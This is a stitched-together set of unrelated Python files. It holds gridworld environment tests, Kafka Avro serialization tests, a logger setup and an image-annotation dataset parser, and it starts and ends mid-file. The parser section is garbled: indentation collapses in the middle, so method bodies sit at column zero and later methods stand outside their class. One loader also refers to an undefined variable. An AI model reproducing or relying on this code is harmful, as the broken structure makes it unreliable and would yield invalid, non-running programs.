            tool_size=4,
            tool_direction=0,
            food_position=(4 + 1, 4 + 1))
        self.assertNoTransition(env, du, render=self._render)
        self.assertTransition(env, dd, render=self._render)
        self.assertTransition(env, dl, render=self._render)
        self.assertTransition(env, dr, render=self._render)
        env = TestEnv(
            art=[
                '  a         ',
                '            ',
                '            ',
                '            ',
                '    mmmm    ',
                '    u  n    ',
                '    u  n    ',
                '    wwww    ',
                '            ',
                '            ',
                '            ',
                '            ',
            ],
            tool_position=(0, 1),
            tool_size=4,
            tool_direction=0,
            food_position=(4 + 1, 4 + 1))
        self.assertNoTransition(env, lu, render=self._render)
        self.assertTransition(env, ld, render=self._render)
        self.assertTransition(env, ll, render=self._render)
        self.assertTransition(env, lr, render=self._render)
        env = TestEnv(
            art=[
                ' a          ',
                '            ',
                '            ',
                '            ',
                '    mmmm    ',
                '    u  n    ',
                '    u  n    ',
                '    wwww    ',
                '            ',
                '            ',
                '            ',
                '            ',
            ],
            tool_position=(0, 2),
            tool_size=4,
            tool_direction=0,
            food_position=(4 + 1, 4 + 1))
        self.assertNoTransition(env, ru, render=self._render)
        self.assertTransition(env, rd, render=self._render)
        self.assertTransition(env, rl, render=self._render)
        self.assertTransition(env, rr, render=self._render)

    def testActionsWithToolBoundariesDown(self):
        env = TestEnv(
            art=[
                '            ',
                '            ',
                '            ',
                '            ',
                '    mmmm    ',
                '    u  n    ',
                '    u  n    ',
                '    wwww    ',
                '            ',
                '            ',
                '            ',
                ' a          ',
            ],
            tool_position=(7, 1),
            tool_size=4,
            tool_direction=0,
            food_position=(4 + 1, 4 + 1))
        self.assertTransition(env, uu, render=self._render)
        self.assertNoTransition(env, ud, render=self._render)
        self.assertTransition(env, ul, render=self._render)
        self.assertTransition(env, ur, render=self._render)
        env = TestEnv(
            art=[
                '            ',
                '            ',
                '            ',
                '            ',
                '    mmmm    ',
                '    u  n    ',
                '    u  n    ',
                ' a  wwww    ',
                '            ',
                '            ',
                '            ',
                '            ',
            ],
            tool_position=(8, 1),
            tool_size=4,
            tool_direction=0,
            food_position=(4 + 1, 4 + 1))
        self.assertTransition(env, du, render=self._render)
        self.assertNoTransition(env, dd, render=self._render)
        self.assertTransition(env, dl, render=self._render)
        self.assertTransition(env, dr, render=self._render)
        env = TestEnv(
            art=[
                '            ',
                '            ',
                '            ',
                '            ',
                '    mmmm    ',
                '    u  n    ',
                '    u  n    ',
                '    wwww    ',
                '  a         ',
                '            ',
                '            ',
                '            ',
            ],
            tool_position=(8, 1),
            tool_size=4,
            tool_direction=0,
            food_position=(4 + 1, 4 + 1))
        self.assertTransition(env, lu, render=self._render)
        self.assertNoTransition(env, ld, render=self._render)
        self.assertTransition(env, ll, render=self._render)
        self.assertTransition(env, lr, render=self._render)
        env = TestEnv(
            art=[
                '            ',
                '            ',
                '            ',
                '            ',
                '    mmmm    ',
                '    u  n    ',
                '    u  n    ',
                '    wwww    ',
                ' a          ',
                '            ',
                '            ',
                '            ',
            ],
            tool_position=(8, 2),
            tool_size=4,
            tool_direction=0,
            food_position=(4 + 1, 4 + 1))
        self.assertTransition(env, ru, render=self._render)
        self.assertNoTransition(env, rd, render=self._render)
        self.assertTransition(env, rl, render=self._render)
        self.assertTransition(env, rr, render=self._render)

    def testActionsWithToolBoundariesRight(self):
        env = TestEnv(
            art=[
                '            ',
                '            ',
                '            ',
                '            ',
                '    mmmm    ',
                '    u  n   a',
                '    u  n    ',
                '    wwww    ',
                '            ',
                '            ',
                '            ',
                '            ',
            ],
            tool_position=(1, 11),
            tool_size=4,
            tool_direction=0,
            food_position=(4 + 1, 4 + 1))
        self.assertTransition(env, uu, render=self._render)
        self.assertTransition(env, ud, render=self._render)
        self.assertTransition(env, ul, render=self._render)
        self.assertNoTransition(env, ur, render=self._render)
        env = TestEnv(
            art=[
                '            ',
                '            ',
                '            ',
                '            ',
                '    mmmm    ',
                '    u  n   a',
                '    u  n    ',
                '    wwww    ',
                '            ',
                '            ',
                '            ',
                '            ',
            ],
            tool_position=(6, 11),
            tool_size=4,
            tool_direction=0,
            food_position=(4 + 1, 4 + 1))
        self.assertTransition(env, du, render=self._render)
        self.assertTransition(env, dd, render=self._render)
        self.assertTransition(env, dl, render=self._render)
        self.assertNoTransition(env, dr, render=self._render)
        env = TestEnv(
            art=[
                '            ',
                '            ',
                '            ',
                '            ',
                '    mmmm    ',
                '    u  n   a',
                '    u  n    ',
                '    wwww    ',
                '            ',
                '            ',
                '            ',
                '            ',
            ],
            tool_position=(5, 10),
            tool_size=4,
            tool_direction=0,
            food_position=(4 + 1, 4 + 1))
        self.assertTransition(env, lu, render=self._render)
        self.assertTransition(env, ld, render=self._render)
        self.assertTransition(env, ll, render=self._render)
        self.assertNoTransition(env, lr, render=self._render)
        env = TestEnv(
            art=[
                '            ',
                '            ',
                '            ',
                '            ',
                '    mmmm    ',
                '    u  n  a ',
                '    u  n    ',
                '    wwww    ',
                '            ',
                '            ',
                '            ',
                '            ',
            ],
            tool_position=(5, 11),
            tool_size=4,
            tool_direction=0,
            food_position=(4 + 1, 4 + 1))
        self.assertTransition(env, ru, render=self._render)
        self.assertTransition(env, rd, render=self._render)
        self.assertTransition(env, rl, render=self._render)
        self.assertNoTransition(env, rr, render=self._render)

    def testActionsWithToolFoodTrap(self):
        env = TestEnv(
            art=[
                '            ',
                '            ',
                '            ',
                '            ',
                '    mmmm    ',
                '    u  n    ',
                '    u  n    ',
                '    wwww    ',
                '      a     ',
                '            ',
                '            ',
                '            ',
            ],
            tool_position=(5, 6),
            tool_size=4,
            tool_direction=0,
            food_position=(5, 5))
        self.assertNoTransition(env, ll, render=self._render)

    def testActionsWithToolFoodTube(self):
        env = TestEnv(
            art=[
                '            ',
                '            ',
                '            ',
                '            ',
                '    mmmm    ',
                '    u  n    ',
                '    u  n    ',
                '    wwww    ',
                '            ',
                '     a      ',
                '            ',
                '            ',
            ],
            tool_position=(6, 5),
            tool_size=4,
            tool_direction=0,
            food_position=(5, 5))
        self.assertNoTransition(env, lu, render=self._render)

    def testActionsTube(self):
        env = TestEnv(
            art=[
                '            ',
                '            ',
                '            ',
                '     a      ',
                '    mmmm    ',
                '    u  n    ',
                '    u  n    ',
                '    wwww    ',
                '            ',
                '            ',
                '            ',
                '            ',
            ],
            tool_position=(0, 0),
            tool_size=4,
            tool_direction=0,
            food_position=(5, 5))
        self.assertNoTransition(env, dd, render=self._render)

    def testActionsExit(self):
        env = TestEnv(
            art=[
                '            ',
                '            ',
                '            ',
                '            ',
                '    mmmm    ',
                '    u  na   ',
                '    u  n    ',
                '    wwww    ',
                '            ',
                '            ',
                '            ',
                '            ',
            ],
            tool_position=(0, 0),
            tool_size=4,
            tool_direction=0,
            food_position=(5, 5))
        self.assertNoTransition(env, ll, render=self._render)

    def testActionsTrap(self):
        env = TestEnv(
            art=[
                '            ',
                '            ',
                '            ',
                '            ',
                '    mmmm    ',
                '   au  n    ',
                '    u  n    ',
                '    wwww    ',
                '            ',
                '            ',
                '            ',
                '            ',
            ],
            tool_position=(0, 0),
            tool_size=4,
            tool_direction=0,
            food_position=(5, 5))
        self.assertNoTransition(env, rr, render=self._render)

    def testActionsTool(self):
        env = TestEnv(
            art=[
                ' a          ',
                '            ',
                '            ',
                '            ',
                '    mmmm    ',
                '    u  n    ',
                '    u  n    ',
                '    wwww    ',
                '            ',
                '            ',
                '            ',
                '            ',
            ],
            tool_position=(0, 0),
            tool_size=4,
            tool_direction=0,
            food_position=(5, 5))
        self.assertTransition(env, rr, render=self._render)

    def testActionsWithToolFoodExit(self):
        env = TestEnv(
            art=[
                '            ',
                '            ',
                '            ',
                '            ',
                '    mmmm    ',
                '    u  n    ',
                '    u  n    ',
                '    wwww    ',
                '     a      ',
                '            ',
                '            ',
                '            ',
            ],
            tool_position=(5, 5),
            tool_size=4,
            tool_direction=0,
            food_position=(5, 6))
        self.assertTransition(env, rr, render=self._render)
        env = TestEnv(
            art=[
                '            ',
                '            ',
                '            ',
                '            ',
                '    mmmm    ',
                '    u  n    ',
                '    u  n    ',
                '    wwww    ',
                '      a     ',
                '            ',
                '            ',
                '            ',
            ],
            tool_position=(5, 6),
            tool_size=4,
            tool_direction=0,
            food_position=(5, 7))
        self.assertTransition(env, rr, render=self._render)
        env = TestEnv(
            art=[
                '            ',
                '            ',
                '            ',
                '            ',
                '    mmmm    ',
                '    u  n    ',
                '    u  n    ',
                '    wwww    ',
                '        a   ',
                '            ',
                '            ',
                '            ',
            ],
            tool_position=(5, 8),
            tool_size=4,
            tool_direction=0,
            food_position=(5, 7))
        self.assertTransition(env, ll, render=self._render)
# Run under the absl test runner when executed directly.
if __name__ == '__main__':
    absltest.main()
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright 2020 Confluent Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import pytest
from confluent_kafka import TopicPartition
from confluent_kafka.serialization import (MessageField,
SerializationContext)
from confluent_kafka.schema_registry.avro import (AvroSerializer,
AvroDeserializer)
class User(object):
    """Plain-Python record used to exercise Avro to_dict/from_dict hooks.

    `schema_str` is the Avro schema this class mirrors.
    """
    schema_str = """
    {
        "namespace": "confluent.io.examples.serialization.avro",
        "name": "User",
        "type": "record",
        "fields": [
            {"name": "name", "type": "string"},
            {"name": "favorite_number", "type": "int"},
            {"name": "favorite_color", "type": "string"}
        ]
    }
    """

    def __init__(self, name, favorite_number, favorite_color):
        self.name = name
        self.favorite_number = favorite_number
        self.favorite_color = favorite_color

    def __repr__(self):
        return "User(name={!r}, favorite_number={!r}, favorite_color={!r})".format(
            self.name, self.favorite_number, self.favorite_color)

    def __eq__(self, other):
        # BUG FIX: the original unconditionally read other's attributes,
        # raising AttributeError when compared with a non-User object.
        # Returning NotImplemented lets Python fall back to identity, so
        # e.g. `user == 5` is simply False.
        if not isinstance(other, User):
            return NotImplemented
        return all([
            self.name == other.name,
            self.favorite_number == other.favorite_number,
            self.favorite_color == other.favorite_color])
@pytest.mark.parametrize("avsc, data, record_type",
                         [('basic_schema.avsc', {'name': 'abc'}, "record"),
                          ('primitive_string.avsc', u'Jรคmtland', "string"),
                          ('primitive_bool.avsc', True, "bool"),
                          ('primitive_float.avsc', 32768.2342, "float"),
                          ('primitive_double.avsc', 68.032768, "float")])
def test_avro_record_serialization(kafka_cluster, load_file, avsc, data, record_type):
    """
    Tests basic Avro serializer functionality: produce `data`, consume it
    back, and compare the round-tripped value.

    Args:
        kafka_cluster (KafkaClusterFixture): cluster fixture
        load_file (callable(str)): Avro file reader
        avsc (str) avsc: Avro schema file
        data (object): data to be serialized
        record_type (str): logical kind of `data`; selects the comparison
    """
    topic = kafka_cluster.create_topic("serialization-avro")
    sr = kafka_cluster.schema_registry()
    schema_str = load_file(avsc)
    value_serializer = AvroSerializer(sr, schema_str)
    value_deserializer = AvroDeserializer(sr)

    producer = kafka_cluster.producer(value_serializer=value_serializer)
    producer.produce(topic, value=data, partition=0)
    producer.flush()

    consumer = kafka_cluster.consumer(value_deserializer=value_deserializer)
    consumer.assign([TopicPartition(topic, 0)])

    msg = consumer.poll()
    actual = msg.value()
    if record_type == 'record':
        # BUG FIX: the original asserted on a list literal
        # (`assert [v == actual[k] ...]`), which is truthy whenever the
        # record has fields — the check could never fail. Use all().
        assert all(v == actual[k] for k, v in data.items())
    elif record_type == 'float':
        assert data == pytest.approx(actual)
    else:
        assert actual == data
@pytest.mark.parametrize("avsc, data,record_type",
                         [('basic_schema.avsc', dict(name='abc'), 'record'),
                          ('primitive_string.avsc', u'Jรคmtland', 'string'),
                          ('primitive_bool.avsc', True, 'bool'),
                          ('primitive_float.avsc', 768.2340, 'float'),
                          ('primitive_double.avsc', 6.868, 'float')])
def test_delivery_report_serialization(kafka_cluster, load_file, avsc, data, record_type):
    """
    Tests Avro serializer functionality, verifying the round-tripped value
    both inside the delivery-report callback and on the consumer side.

    Args:
        kafka_cluster (KafkaClusterFixture): cluster fixture
        load_file (callable(str)): Avro file reader
        avsc (str) avsc: Avro schema file
        data (object): data to be serialized
        record_type (str): logical kind of `data`; selects the comparison
    """
    topic = kafka_cluster.create_topic("serialization-avro-dr")
    sr = kafka_cluster.schema_registry()
    schema_str = load_file(avsc)
    value_serializer = AvroSerializer(sr, schema_str)
    value_deserializer = AvroDeserializer(sr)

    producer = kafka_cluster.producer(value_serializer=value_serializer)

    def assert_cb(err, msg):
        # Deserialize the delivered payload and compare against the input.
        actual = value_deserializer(msg.value(),
                                    SerializationContext(topic, MessageField.VALUE, msg.headers()))
        if record_type == "record":
            # BUG FIX: `assert [ ... ]` on a non-empty list is always truthy
            # and could never fail; use all() so mismatches are detected.
            assert all(v == actual[k] for k, v in data.items())
        elif record_type == 'float':
            assert data == pytest.approx(actual)
        else:
            assert actual == data

    producer.produce(topic, value=data, partition=0, on_delivery=assert_cb)
    producer.flush()

    consumer = kafka_cluster.consumer(value_deserializer=value_deserializer)
    consumer.assign([TopicPartition(topic, 0)])

    msg = consumer.poll()
    actual = msg.value()
    # schema may include default which need not exist in the original
    if record_type == 'record':
        # BUG FIX: same ineffective list-literal assert as above.
        assert all(v == actual[k] for k, v in data.items())
    elif record_type == 'float':
        assert data == pytest.approx(actual)
    else:
        assert actual == data
def test_avro_record_serialization_custom(kafka_cluster):
    """
    Tests basic Avro serializer to_dict and from_dict object hook
    functionality by round-tripping a User instance.

    Args:
        kafka_cluster (KafkaClusterFixture): cluster fixture
    """
    topic = kafka_cluster.create_topic("serialization-avro")
    registry = kafka_cluster.schema_registry()

    def _user_to_dict(obj, ctx):
        # Serializer hook: User instance -> plain dict matching the schema.
        return dict(name=obj.name,
                    favorite_number=obj.favorite_number,
                    favorite_color=obj.favorite_color)

    def _dict_to_user(payload, ctx):
        # Deserializer hook: plain dict -> User instance.
        return User(**payload)

    value_serializer = AvroSerializer(registry, User.schema_str, _user_to_dict)
    value_deserializer = AvroDeserializer(registry, User.schema_str, _dict_to_user)

    original = User('Bowie', 47, 'purple')
    producer = kafka_cluster.producer(value_serializer=value_serializer)
    producer.produce(topic, value=original, partition=0)
    producer.flush()

    consumer = kafka_cluster.consumer(value_deserializer=value_deserializer)
    consumer.assign([TopicPartition(topic, 0)])

    round_tripped = consumer.poll().value()
    assert round_tripped == original
|
import logging
import sys

# Shared stdout handler for the package-level 'scylla' logger.
_log_formatter = logging.Formatter(
    fmt="[%(asctime)s] [%(process)d] [%(levelname)s] [%(pathname)s:%(lineno)d]: %(message)s")

_stdout_handler = logging.StreamHandler(sys.stdout)
_stdout_handler.setLevel(logging.DEBUG)
_stdout_handler.setFormatter(_log_formatter)

# Public module-level logger; everything down to DEBUG goes to stdout.
# A logging.FileHandler can additionally be attached here to log to disk.
logger = logging.getLogger('scylla')
logger.setLevel(logging.DEBUG)
logger.addHandler(_stdout_handler)
|
__author__ = 'mangalbhaskar'
__version__ = '1.0'
"""
Generic Annotation Dataset Parser
------------------------------------------------------------
Copyright (c) 2020 mangalbhaskar
Licensed under [see LICENSE for details]
Written by mangalbhaskar
------------------------------------------------------------
"""
import os
import numpy as np
import skimage.io
import skimage.draw
import json
import sys
import logging
# Make this file's directory importable so the sibling modules below
# (common, apputil, Base, ...) resolve when the file is run as a script.
this_dir = os.path.dirname(__file__)
if this_dir not in sys.path:
    sys.path.append(this_dir)
# Application roots come from environment variables.
# NOTE(review): os.getenv returns None when a variable is unset, and None
# would then be appended to sys.path — confirm deployment always sets these.
APP_ROOT_DIR = os.getenv('AI_APP')
ROOT_DIR = os.getenv('AI_HOME')
BASE_PATH_CFG = os.getenv('AI_CFG')
if APP_ROOT_DIR not in sys.path:
    sys.path.append(APP_ROOT_DIR)
if BASE_PATH_CFG not in sys.path:
    sys.path.append(BASE_PATH_CFG)
## custom imports
import common
import apputil
from Base import Dataset
from annon.dataset.Annon import ANNON
# Child of the application's __main__ logger so records propagate upward.
log = logging.getLogger('__main__.'+__name__)
class AnnonDataset(Dataset):
    """Generic annotation dataset parser; dispatches to a per-format loader."""
    # Dataset name; overwritten per instance in __init__.
    name = ""
    # num_classes = 0
    # Annotation format identifier (e.g. 'labelImg', 'via'); set by loaders.
    annon_type = ""
    # Concrete class object of the instance (set in __init__).
    pyclassid = None
    # Backing annotation store, when one is attached.
    annon = None
def __init__(self, name=None):
self.pyclassid = self.__class__
super(self.__class__, self).__init__()
self.name = name
def add_class(self, source, idx, class_name, lbl_id=None, color=None):
super(self.__class__, self).add_class(source, idx, class_name, lbl_id, color)
return
def add_image(self, source, image_id, path, **kwargs):
super(self.__class__, self).add_image(source, image_id, path, **kwargs)
return
def get_classid_from_source_class_name(self, source_class_name):
class_id = self.classname_from_sourcename_map[source_class_name]
if not class_id:
class_id = super(self.__class__, self).get_classid_from_source_class_name(source_class_name)
return class_id
def get_classid_from_source_class_id(self, source_class_id):
log.info("source_class_id: {}".format(source_class_id))
class_id = self.class_from_source_map[source_class_id]
if not class_id:
class_id = super(self.__class__, self).get_classid_from_source_class_id(source_class_id)
return class_id
def get_classname_from_source_class_id(self, source_class_id):
class_name = self.classname_from_source_map[source_class_id]
if not class_name:
class_name = super(self.__class__, self).get_classname_from_source_class_id(source_class_id)
return class_name
def load_data(self, appcfg, dbcfg, datacfg, subset):
"""
load the data based on the annotation type
"""
log.info("--------------------------------> {}".format(subset))
# if subset:
# splits = datacfg.splits
# # Train or validation or testing dataset?
# assert subset in splits
log.info("load_data:-----> {}".format(datacfg.name))
annon_type = datacfg.annon_type
fname = 'load'+'_'+annon_type
log.info("load_data::fname: {}".format(fname))
fn = getattr(self, fname)
## TBD: raise unknown error
if fn:
return fn(appcfg=appcfg, dbcfg=dbcfg, datacfg=datacfg, subset=subset)
else:
log.info("Unknown fn: {}".format(fname))
return
def load_labelImg(self, appcfg, dbcfg, datacfg, subset):
"""
labelImg specific CSV header:
,Image Server Path,Dest Path,Top,Left,Width,Height,Label
log.info("Top,Left,Width,Height,Label")
- assume data in csv file format
TODO:
- json file data loading
"""
log.info("AnnonDataset::load_labelImg::-------------------------------->")
annotation_filename = datacfg['annotations']
images_dir = datacfg['images']
log.info("annotation_filename: {}".format(annotation_filename))
log.info("images_dir: {}".format(images_dir))
annon_type = datacfg.annon_type
name = datacfg.name
fixed_lbl_id = datacfg.single_class if 'single_class' in datacfg else None
# class_ids = []
total_annotation = 0
total_img = 0
images = set()
class_labels = set()
data_read_threshold = datacfg.data_read_threshold if 'data_read_threshold' in datacfg else 0
log.info("data_read_threshold: {}".format(data_read_threshold))
## Add images
for line in common.read_csv_line(annotation_filename):
if data_read_threshold == total_img:
log.info("Threshold reached: total_img: {}".format(total_img))
break
image_name = line[1].split("\\")[-1]
# image_path = os.path.join(images_dir, image_name)
filepath = os.path.join(images_dir, image_name)
# image_path = apputil.get_abs_path(appcfg, img, 'AI_ANNON_DATA_HOME_LOCAL')
# filepath = os.path.join(image_path, filename)
# log.debug("filepath: {}".format(filepath))
if os.path.exists(filepath):
images.add(filepath)
lbl_id = line[-1]
lbl_id = fixed_lbl_id if fixed_lbl_id else lbl_id.lower().replace(' ','_')
attributes = {}
class_labels.add(lbl_id)
# log.info("lbl_id: {}".format(lbl_id))
if 'height' not in img or 'width' not in img:
im = skimage.io.imread(filepath)
height, width = im.shape[:2]
else:
height, width = img['height'], img['width']
# log.info("height, width: {} {}".format(height, width))
# log.info("{}, {}, {},{},{},{},{}".format(image_name, line[-6], line[-5], line[-4], line[-3], line[-2], line[-1]))
# count += 1
## top(y), left(x), height, width
annotations = [int(line[-5]), int(line[-4]), int(line[-2]), int(line[-3])]
# log.info("bbox: {}".format(annotations))
total_annotation += 1
attributes['lbl_id'] = lbl_id
self.add_image(
name,
image_id=name+'-'+image_name, # use file name as a unique image id
path=filepath,
width=width,
height=height,
annon_type=annon_type,
annotations=annotations,
attributes=attributes)
total_img = len(images)
total_classes = len(class_labels)
# for index, class_name in enumerate(class_ids):
for index, class_name in enumerate(list(class_labels)):
class_id = index+1
log.info("name, class_id ,class_name: {},{},{}".format(name, class_id, class_name))
## "source_name", "id", "name"
self.add_class(name, class_id, class_name)
log.info("Total Images: {}".format(total_img))
log.info("Total Annotations: {}".format(total_annotation))
log.info("Total Classes: {}".format(total_classes))
log.info("Class Labels, Total class_labels: {}".format(class_labels, len(class_labels)))
log.info("-------")
return total_img, total_annotation, total_classes
def load_via(self, appcfg, dbcfg, datacfg, subset):
    """Load a dataset annotated with the VGG Image Annotator (VIA).

    VIA (up to version 1.6) saves each image in the form:
        { 'filename': '28503151_5b5b7ec140_b.jpg',
          'regions': { '0': { 'region_attributes': {},
                              'shape_attributes': { 'all_points_x': [...],
                                                    'all_points_y': [...],
                                                    'name': 'polygon'}},
                       ... more regions ... },
          'size': 100202 }
    In VIA 2.0, ``regions`` changed from a dict to a list; both are handled.

    :param appcfg: application config (unused here, kept for a uniform loader signature)
    :param dbcfg: database config (unused here, kept for a uniform loader signature)
    :param datacfg: dataset config; reads ANNOTATIONS, IMAGES, annon_type,
        name, optional SINGLE_CLASS and data_read_threshold
    :param subset: subset name (unused here, kept for a uniform loader signature)
    :return: (total_img, total_annotation, total_classes)

    TODO:
    - csv file loading
    """
    log.info("AnnonDataset::load_json_via::-------------------------------->")
    annotation_filename = datacfg['ANNOTATIONS']
    images_dir = datacfg['IMAGES']
    log.info("annotation_filename: {}".format(annotation_filename))
    log.info("images_dir: {}".format(images_dir))
    annon_type = datacfg.annon_type
    name = datacfg.name
    # Optional single-class override: every region gets this fixed label.
    fixed_lbl_id = datacfg.single_class if 'SINGLE_CLASS' in datacfg else None
    with open(annotation_filename, 'r') as fr:
        dataset = json.load(fr)
    dataset = list(dataset.values())  # don't need the dict keys
    # The VIA tool saves entries even for unannotated images; skip those.
    dataset = [a for a in dataset if a['regions']]
    total_annotation = 0
    total_img = 0
    class_labels = set()
    # BUG FIX: the default was 0, which made `data_read_threshold == i` true
    # at i == 0 and aborted the entire load when no threshold was configured.
    # Use -1 (never matches a valid index), consistent with load_hmd.
    data_read_threshold = datacfg.data_read_threshold if 'data_read_threshold' in datacfg else -1
    log.info("data_read_threshold: {}".format(data_read_threshold))
    ## Add images
    for i, a in enumerate(dataset):
        if data_read_threshold == i:
            log.info("Threshold reached: i: {}".format(i))
            break
        # Polygon points live in shape_attributes (see docstring). The
        # isinstance-style branch supports both VIA 1.x (dict) and 2.x (list).
        if type(a['regions']) is dict:
            annotations = [r['shape_attributes'] for r in a['regions'].values()]
            attributes = [r['region_attributes'] for r in a['regions'].values()]
        else:
            annotations = [r['shape_attributes'] for r in a['regions']]
            attributes = [r['region_attributes'] for r in a['regions']]
        image_name = a['filename']
        filepath = os.path.join(images_dir, a['filename'])
        total_annotation_per_img = len(annotations)
        for j in range(0, len(annotations)):
            if attributes[j] == {}:
                # Unlabeled region: fall back to the fixed single-class label.
                attributes[j]['lbl_id'] = fixed_lbl_id
                class_labels.add(fixed_lbl_id)
            elif 'lbl_id' in attributes[j]:
                class_labels.add(attributes[j]['lbl_id'])
        total_annotation += total_annotation_per_img
        if os.path.exists(filepath):
            # BUG FIX: the original referenced an undefined name `img` here
            # (copied from load_hmd), raising NameError. The VIA record is `a`;
            # read the image for its size when the record carries none.
            # VIA does not normally include height/width in the JSON, so this
            # usually reads the file — manageable only for small datasets.
            if 'height' not in a or 'width' not in a:
                im = skimage.io.imread(filepath)
                height, width = im.shape[:2]
            else:
                height, width = a['height'], a['width']
            self.add_image(
                name,
                image_id=name + '-' + image_name,  # use file name as a unique image id
                path=filepath,
                width=width,
                height=height,
                annon_type=annon_type,
                annotations=annotations,
                attributes=attributes)
    total_img = len(dataset)
    total_classes = len(class_labels)
    for index, class_name in enumerate(class_labels):
        class_id = index + 1
        log.info("name, index, class_name: {}, {}, {}".format(name, class_id, class_name))
        ## "source_name", "id", "name"
        self.add_class(name, class_id, class_name)
    log.info("Total Images: {}".format(total_img))
    log.info("Total Annotations: {}".format(total_annotation))
    log.info("Total Classes: {}".format(total_classes))
    # BUG FIX: format string had one placeholder for two arguments, so the
    # count was silently dropped from the log line.
    log.info("Class Labels, Total class_labels: {}, {}".format(class_labels, len(class_labels)))
    log.info("-------")
    return total_img, total_annotation, total_classes
def load_hmd(self, appcfg, dbcfg, datacfg, subset):
    """Load an HMD-format dataset through the ANNON database helper.

    :param appcfg: application config, used to resolve image base paths
    :param dbcfg: database config handed to ANNON
    :param datacfg: dataset config; reads class_ids, annon_type, name and
        optional data_read_threshold
    :param subset: subset name handed to ANNON
    :return: (total_img, total_annotation, total_classes, annon)

    TODO:
    - csv file loading
    """
    log.info("-------------------------------->")
    log.debug("datacfg: {}".format(datacfg))
    class_ids = datacfg.class_ids if 'class_ids' in datacfg and datacfg['class_ids'] else []
    annon_type = datacfg.annon_type
    name = datacfg.name
    annon = self.annon = ANNON(dbcfg, datacfg, subset=subset)
    class_ids = annon.getCatIds(catIds=class_ids)
    image_ids = annon.getImgIds(catIds=class_ids)
    log.debug("subset, class_ids: {}, {}".format(subset, class_ids))
    ## Add images
    total_annotation = 0
    total_maskarea = 0
    total_bboxarea = 0
    # -1 means "no threshold": it never equals a valid enumerate index.
    data_read_threshold = datacfg.data_read_threshold if 'data_read_threshold' in datacfg else -1
    log.debug("data_read_threshold: {}".format(data_read_threshold))
    images = annon.loadImgs(ids=image_ids)
    for i, img in enumerate(images):
        if data_read_threshold == i:
            log.info("Threshold reached: i: {}".format(i))
            break
        image_path = apputil.get_abs_path(appcfg, img, 'AI_ANNON_DATA_HOME_LOCAL')
        filepath = os.path.join(image_path, img['filename'])
        if os.path.exists(filepath):
            try:
                # Prefer the size recorded in the DB; fall back to reading
                # the image only when height/width are missing.
                if 'height' not in img or 'width' not in img:
                    im = skimage.io.imread(filepath)
                    height, width = im.shape[:2]
                else:
                    height, width = img['height'], img['width']
                img_id = img['img_id']
                annotations = annon.loadAnns(annon.getAnnIds(imgIds=[img_id], catIds=class_ids))
                total_annotation += len(annotations)
                self.add_image(
                    name,
                    image_id=name + '-' + str(img_id),
                    path=filepath,
                    width=width,
                    height=height,
                    annon_type=annon_type,
                    annotations=annotations)
            # BUG FIX: was a bare `except:` which also swallowed
            # KeyboardInterrupt/SystemExit; keep the best-effort behavior
            # but only catch ordinary exceptions.
            except Exception:
                log.info("Error Reading file or adding annotation: {}".format(filepath))
                log.error("Exception occurred", exc_info=True)
        else:
            log.info("file does not exists: {}".format(filepath))
    total_img = len(image_ids)
    total_classes = len(class_ids)
    classinfo = annon.loadCats(ids=class_ids)
    for index, ci in enumerate(classinfo):
        class_idx = index + 1
        class_source, class_lbl_id, class_name = ci['source'], ci['lbl_id'], ci['name']
        # BUG FIX: the format string listed four values but had only three
        # placeholders, silently dropping class_idx from the log line.
        log.info("Adding: class_source, class_lbl_id, class_name, class_idx: {}, {}, {}, {}".format(class_source, class_lbl_id, class_name, class_idx))
        self.add_class(source=class_source, idx=class_idx, class_name=class_name, lbl_id=class_lbl_id, color=None)
    log.info("Total Images: {}".format(total_img))
    log.info("Total Annotations: {}".format(total_annotation))
    log.info("Total Classes without BG: {}".format(total_classes))
    log.info("Total Classes including BG: {}".format(len(self.classinfo)))
    log.info("Classinfo: {}".format(self.classinfo))
    log.info("-------")
    return total_img, total_annotation, total_classes, annon
def load_json_coco(self, appcfg, dbcfg, datacfg, subset):
    """Load a COCO-format dataset by delegating to CocoDataset.

    A reference to the wrapped dataset is kept on ``self.cocodataset`` so
    that mask loading can later be routed through ``load_mask_coco``.

    :return: (total_img, total_annotation, total_classes)
    """
    log.info("AnnonDataset::load_json_coco::-------------------------------->")
    import CocoDataset
    coco_ds = CocoDataset.CocoDataset("coco", self)
    self.cocodataset = coco_ds
    return coco_ds.load_data(datacfg['SUBSET'], datacfg, datacfg['CLASS_IDS'], datacfg['CLASS_MAP'])
def load_mask(self, image_id, datacfg=None, config=None):
    """Load instance masks for the given image.

    Different datasets use different ways to store masks. This function
    routes to the appropriate ``load_mask_<annon_type>`` implementation,
    which converts the stored format to a bitmap [height, width, instances].

    :param image_id: internal index into ``self.image_info``
    :param datacfg: dataset config; its ``name`` selects this dataset source
    :param config: passed through to the concrete loader
    :return: whatever the concrete ``load_mask_*`` returns — typically
        (masks, class_ids, keys, values); delegates to the parent class
        for images from a different source
    """
    info = self.image_info[image_id]
    name = datacfg.name if datacfg and datacfg.name else None
    ## route to proper load_mask_<annon_type>
    ##------------------------------------------
    annon_type = ''
    if "annon_type" in info:
        annon_type = info["annon_type"]
    elif "source" in info:
        ## coco has source key used to route to proper load_mask function
        annon_type = info["source"]
    fname = 'load_mask_' + annon_type
    ds_source = info["source"]
    # If the image is not from this dataset, delegate to the parent class.
    # NOTE(review): super(self.__class__, self) recurses infinitely if this
    # class is ever subclassed — it should name the class explicitly; left
    # unchanged because the class name is not visible in this chunk.
    if ds_source != name:
        return super(self.__class__, self).load_mask(image_id)
    # BUG FIX: getattr() without a default raises AttributeError for an
    # unknown annon_type, which made the "Unknown fn" fallback below
    # unreachable; supply None so the guard works as intended.
    fn = getattr(self, fname, None)
    if fn:
        return fn(image_id, info, datacfg, config)
    log.info("Unknown fn: {}".format(fname))
    return
def load_mask_coco(self, image_id, info, datacfg=None, config=None):
    """Delegate mask loading for COCO-sourced images to the wrapped CocoDataset."""
    return self.cocodataset.load_mask(image_id, datacfg)
def load_mask_via(self, image_id, info, datacfg=None, config=None):
    """Build per-instance masks for a VIA-annotated image.

    :param image_id: internal index into ``self.image_info``
    :param info: the image_info record (carries annotations/attributes/size)
